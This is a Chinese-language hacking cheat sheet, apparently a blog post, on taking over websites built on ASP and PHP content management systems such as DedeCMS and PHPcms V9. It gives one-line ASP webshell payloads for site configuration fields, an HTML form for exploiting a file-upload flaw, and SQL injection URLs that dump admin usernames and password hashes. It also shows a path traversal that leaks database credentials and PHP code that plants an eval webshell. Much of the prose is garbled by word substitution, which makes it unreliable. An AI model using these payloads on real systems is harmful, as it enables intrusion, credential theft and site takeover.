( 一句子话木马的妙用 )

安插入一句话木马后,连接网站的布文件:inc/config.asp 密码都是g

1.网站配置-允许的上传文件类型-插入闭合的一模一样句话木马:”%><%eval
request(“g”)%><%s=” 
不行就大增一个cer格式,之后上传cer格式的木马即可

2.网站配置-网站地址-插入闭合的一律句话木马:http://”%&gt;&lt;%execute(request(“g”))%&gt;&lt;%’

3.网站配置-网站名称-插入闭合的平等句话木马:沧州临港彩越化工有限公司”%><%eval
request(“g”)%><%s=”

4.网站配置-版权信息-插入闭合的同句子话木马:”%><%eval(request(chr(103)))%><%’

5.本智适用于access数据库,只要以access数据库任何地方插入:┼攠數畣整爠煥敵瑳∨≡┩>
再以mdb备份成asp或者asa,访问是asp或asa,就是如出一辙句话木马。

 

( 利用upfile_other.asp漏洞拿shell )

一直看会员中心:userreg.asp

登记一个用户并于无退登录的状态下,使用对文书上传工具得以爆它菊花,以下代码保存也1.html,并中的改动目标站,第一个达标传jpg,第二单达到传cer

<HTML><HEAD> <META http-equiv=Content-Type
content=”text/html; charset=gb2312″> <STYLE type=text/css>BODY
{ FONT-SIZE: 9pt; BORDER-TOP: #000000 1px solid; FONT-SIZE: 9pt;
BORDER-LEFT: #000000 1px solid; COLOR: #0000ff; BORDER-BOTTOM:
#000000 1px solid; HEIGHT: 20px } </STYLE>
<META content=”MSHTML 6.00.2800.1400″ name=GENERATOR></HEAD>
<BODY leftMargin=0 topMargin=0> <FORM name=form1
action=”http://www.xxx.com/upfile_other.asp“; method=post
encType=multipart/form-data><INPUT type=file size=30
name=FileName> <INPUT type=file size=30 name=FileName1>
<INPUT style=”BORDER-RIGHT: rgb(88,88,88) 1px double; BORDER-TOP:
rgb(88,88,88) 1px double; FONT-WEIGHT: normal; FONT-SIZE: 9pt;
BORDER-LEFT: rgb(88,88,88) 1px double; LINE-HEIGHT: normal;
BORDER-BOTTOM: rgb(88,88,88) 1px double; FONT-STYLE: normal;
FONT-VARIANT: normal” type=submit value=上传 name=Submit> <INPUT
id=PhotoUrlID type=hidden value=0 name=PhotoUrlID>
</FORM></BODY></HTML>

另外可以利用会员中心的cookies,用火狐浏览器登陆后,访问upfile_other.asp页面,用抓包工具去抓捕包,接着用明小子上传拿shell.

 

( 上传漏洞 )

漏洞文件:Upfile_Photo.asp

前提是上后台了,访问这文件,将唤起“请先选择你如上污染之公文!”,用抓包工具抓管理员的cookies,再把上传地址与cookies扔到叫儿子里及传拿shell

 

( 南方在线编器 )

默认后台:admin/Southidceditor/admin_style.asp

数据库路径:admin/SouthidcEditor\Datas\SouthidcEditor.mdb

遍历目录:admin/Southidceditor/admin_uploadfile.asp?id=14&dir=../..

文本及传页面:admin/Southidceditor/ewebeditor.asp?id=57&style=southidc

体设置页面:admin/SouthidcEditor/Admin_Style.asp?action=styleset&id=47

=============================================================================================================================================================

【 dedecms最新注入漏洞和查找后高技术 】

看这:plus/search.php?keyword=as&typeArr[ uNion ]=a

在押结果要提示:Safe Alert: Request Error step 1 !

 

那直接用脚的exp爆出有管理员的帐号密码:
plus/search.php?keyword=as&typeArr[111%3D@`\’`)+and+(SELECT+1+FROM+(select+count(*),concat(floor(rand(0)*2),(substring((select+CONCAT(0x7c,userid,0x7c,pwd)+from+`%23@__admin`+limit+0,1),1,62)))a+from+information_schema.tables+group+by+a)b)%23@`\’`+]=a

在押结果如提示:Safe Alert: Request Error step 2 !

那么直接用底的exp爆出有管理员的帐号密码:  a198654
plus/search.php?keyword=as&typeArr[111%3D@`\’`)+UnIon+seleCt+1,2,3,4,5,6,7,8,9,10,userid,12,13,14,15,16,17,18,19,20,21,22,23,24,25,26,pwd,28,29,30,31,32,33,34,35,36,37,38,39,40,41,42+from+`%23@__admin`%23@`\’`+]=a

稍加/plus/目录换成了/plugins/目录,这时就要将/plus/换成/plugins/进行注射了

破解出md5为20员结果,只待将前三号以及晚一致各类去丢,剩余16各项将去解密即可

如何寻找后令?

默认后台:dede

首先栽方法:data/mysql_error_trace.inc (有时可以爆出路径)

老二栽方式:把域名作为后台去品尝

其三栽艺术:查看这文件:robots.txt

季种方法:ping下域名博ip之后,http://www.bing.com/ 搜索:ip:127.0.0.1
php
(可能获得后台也足以获任何旁注站,一般dede的旁站众乎是dedecms的)

=============================================================================================================================================================

【 PHPcms V9 爆数据库信息漏洞】

一直暴露数据库连接信息:/index.php?m=search&c=index&a=public_get_suggest_keyword&url=asdf&q=../../phpsso_server/caches/configs/database.php

有关后台拿webshell:进入后台后点击界面–模版风格–随便找个页面点击修改,插入我们的一致句话代码

<?

 

$fp = @fopen(“0day.php”, ‘a’);

@fwrite($fp,
‘<’.’?php’.”\r\n\r\n”.’eval($_POST[0day])’.”\r\n\r\n?”.”>\r\n”);

点击保存,接着点击可视化,代码就成功实行了,接着菜刀连接/0day.php,密码0day

相关文章